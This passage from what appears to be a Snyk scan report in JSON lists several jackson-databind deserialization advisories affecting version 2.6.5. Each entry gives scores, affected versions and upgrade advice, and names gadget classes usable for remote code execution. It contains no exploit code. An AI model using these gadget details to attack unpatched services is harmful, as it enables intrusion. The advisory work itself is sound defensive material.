The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - 
"socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
